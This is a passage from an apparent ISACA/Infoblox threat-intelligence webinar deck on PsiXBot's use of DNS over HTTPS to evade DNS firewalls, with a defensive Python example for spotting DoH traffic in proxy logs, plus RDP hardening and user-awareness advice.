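Some legitimate software does talk to IP literals, so the count of distinct hosts and the failure ratio are the useful thresholds; a client with several distinct public IP-literal POST targets and mostly non-200 results within a minute is a strong candidate for the post-encryption beaconing described above, and by that point the priority is isolation and backup verification rather than further analysis.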
PsiXBot INFOSTEALER USES DNS OVER HTTPS

Overview
• On 11 December, Malware Traffic Analysis reported
on a campaign in which a threat actor was delivering
PsiXBot via the Spelevo exploit kit (EK).
• PsiXBot steals information, adds computers to its
botnet and uses DNS over HTTPS (DoH).

Customer Impact
• PsiXBot uses Google’s DoH service to encrypt its DNS queries and hide them within normal HTTPS traffic.
• This circumvents DNS firewalls, since the queries to the threat actor domains are not sent on port 53.
• The threat actor uses fast flux to prevent the C2 IP address from being blocked.

Campaign Analysis
• The campaign reported by Malware Traffic Analysis used malvertisements placed on legitimate websites to redirect the user’s browser to the malicious domain hosting the Spelevo EK.
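A DNS firewall only sees what arrives on port 53, so the defensive answer to DoH-using malware is to make DNS over HTTPS visible (or unavailable) at the proxy layer: known public DoH resolvers, the RFC 8484 path and media type, and the JSON API path are all recognisable, and where TLS is inspected the queried name can even be recovered from a GET-style request. The Python below is an added example, not Infoblox's or the presenter's code: it classifies constructed proxy records (fields client, url and content_type are assumptions) and decodes the dns= parameter, which RFC 8484 defines as unpadded base64url of a DNS wire-format message. The resolver list holds real public services; extend it with whatever your own telemetry shows.

```python
import base64
import struct
from urllib.parse import urlsplit, parse_qs

# Well-known public DoH resolvers; extend with your own observations.
DOH_HOSTS = {"dns.google", "cloudflare-dns.com", "mozilla.cloudflare-dns.com", "dns.quad9.net"}
DOH_PATHS = ("/dns-query", "/resolve")          # RFC 8484 endpoint; Google JSON API endpoint
DOH_MEDIA_TYPES = {"application/dns-message", "application/dns-json"}


def classify_doh(rec):
    """Reasons a proxy record looks like DNS over HTTPS (empty list if none)."""
    reasons = []
    parts = urlsplit(rec["url"])
    if (parts.hostname or "").lower() in DOH_HOSTS:
        reasons.append("known-doh-host")
    if parts.path.lower() in DOH_PATHS:
        reasons.append("doh-path")
    if rec.get("content_type", "").lower() in DOH_MEDIA_TYPES:
        reasons.append("dns-media-type")
    return reasons


def build_dns_query(name, qtype=1):
    """Constructed minimal DNS query (ID 0, RD set); used only to build the sample record."""
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)


def doh_param(query_bytes):
    """Unpadded base64url, the encoding the dns= parameter uses."""
    return base64.urlsafe_b64encode(query_bytes).rstrip(b"=").decode()


def decode_doh_qname(url):
    """Recover the queried name from a GET-style DoH URL, or None if there is no dns= parameter."""
    qs = parse_qs(urlsplit(url).query)
    if "dns" not in qs:
        return None
    raw = qs["dns"][0]
    msg = base64.urlsafe_b64decode(raw + "=" * (-len(raw) % 4))
    pos, labels = 12, []                         # skip the 12-byte header, read the question name
    while pos < len(msg) and msg[pos] != 0:
        n = msg[pos]
        labels.append(msg[pos + 1:pos + 1 + n].decode("ascii", "replace"))
        pos += 1 + n
    return ".".join(labels) if labels else None


def doh_clients(records):
    """Clients with at least one strong DoH indicator (known resolver or DNS media type);
    a DoH-looking path alone is too noisy to act on. Maps client -> queried names seen."""
    out = {}
    for r in records:
        reasons = classify_doh(r)
        if "known-doh-host" in reasons or "dns-media-type" in reasons:
            out.setdefault(r["client"], []).append(decode_doh_qname(r["url"]))
    return out


# Constructed proxy records; not real traffic.
SAMPLE_RECORDS = [
    {"client": "10.2.0.7", "url": "https://dns.google/dns-query?dns=" + doh_param(build_dns_query("example.com")),
     "content_type": "application/dns-message"},
    {"client": "10.2.0.7", "url": "https://www.example.invalid/resolve?name=x", "content_type": "text/html"},
    {"client": "10.2.0.8", "url": "https://www.example.invalid/news", "content_type": "text/html"},
]

if __name__ == "__main__":
    print(doh_clients(SAMPLE_RECORDS))
```

Browsers and some operating systems use DoH legitimately, so the policy decision is which resolvers are sanctioned: allow your own (or your DNS security vendor's) DoH endpoint and block or alert on the rest, which puts the malware's queries back in front of the DNS firewall the deck recommends.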
PsiXBot INFOSTEALER USES DNS OVER HTTPS

Attack Chain
VULNERABILITIES & MITIGATION

Common Themes Centered Around User Interaction!

• Lokibot
• Nemty Loves You
• SWIFT Email
• Ursnif Banking Trojan
• Emotet Stole Christmas
• Dridex Banking Trojan
• Dreambot Banking Trojan
• Rig Exploit Kit

Let's Not Forget the RDP Attack Vector - in our Last Report

• Cryptomix: RDP Server Attacker
• Change the default RDP port numbers
• Eliminate default credentials
• Add 2 factor authentication for RDP login.
GUIDANCE: FOR YOUR USERS

• NEVER EVER ENABLE MACROS.

• Be cautious of archive files, especially if the file size is unusually small (.zip .rar .gz .sitx .7z)

• Be aware of the attachment’s file type, and NEVER OPEN .vbs, .cmd, or .bat

• DON’T OPEN vague emails.

• BE SUSPICIOUS OF unexpected emails, especially when they pertain to financial documents.

• Be aware of PHISHING and how to handle it appropriately.

• You are being SOCIALLY ENGINEERED even now!
BEST PRACTICES - IT & SOC TEAMS

• User education!
• Assess threat intelligence and your environment.
• Leverage threat intelligence with foundational security wrapped around DNS.
• Install the latest security patches.
• Install the latest firmware updates.
• Limit the number of users who can access remote desktops.
• Enable network level authentication (NLA).
• Require strong passwords from users.
• Backup data and systems regularly and store data offsite and off the network.
• Install email security solutions.
• Place RDP servers behind firewalls.
THREAT INTELLIGENCE DATA BRINGS COMPELLING VALUE

• Threat intelligence data is a game changer!

• You need to understand, for your industry, business size, and geography, the most likely attackers and the tactics, techniques, and procedures they may use.

• The digital transformation has all but eliminated the traditional perimeter model as a viable defense. You are wide open even now.

• Threat intelligence gives you the tools you need to fight (and win)!
ABOUT INFOBLOX

Infoblox delivers the next-level network experience with its Secure Cloud-
Managed Network Services.
As a pioneer in providing the world’s most reliable, secure, and automated
networks, we are relentless in our pursuit of next-level network simplicity.
A recognized industry leader, Infoblox has 50 percent market share comprised of
8,000 customers, including 350 of the Fortune 500.

To learn more please visit our website via www.infoblox.com.


QUESTIONS?
This training content (“content”) is provided to you without warranty, “as is” and “with
all faults”. ISACA makes no representations or warranties express or implied, including
those of merchantability, fitness for a particular purpose or performance, and non-
infringement, all of which are hereby expressly disclaimed.

You assume the entire risk for the use of the content and acknowledge that: ISACA
has designed the content primarily as an educational resource for IT professionals and
therefore the content should not be deemed either to set forth all appropriate
procedures, tests, or controls or to suggest that other procedures, tests, or controls
that are not included may not be appropriate; ISACA does not claim that use of the
content will assure a successful outcome and you are responsible for applying
professional judgement to the specific circumstances presented in determining the
appropriate procedures, tests, or controls.

Copyright © 2020 by the Information Systems Audit and Control Association, Inc. (ISACA). All rights reserved. This webinar may not be used, copied, reproduced,
modified, distributed, displayed, stored in a retrieval system, or transmitted in any form by any means (electronic, mechanical, photocopying, recording or otherwise).
THANK YOU FOR
ATTENDING THIS
ISACA WEBINAR
